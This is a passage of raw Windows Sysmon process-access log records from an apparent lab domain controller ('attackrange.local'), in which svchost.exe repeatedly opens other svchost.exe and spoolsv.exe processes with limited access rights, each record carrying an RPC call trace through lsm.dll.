09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055384Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055383Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055382Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055381Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055380Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055379Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055378Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055377Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055376Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055375Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055374Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055373Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055372Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055371Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055370Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055369Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055368Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055367Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055366Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055365Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055364Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055363Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055362Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.952{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055361Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 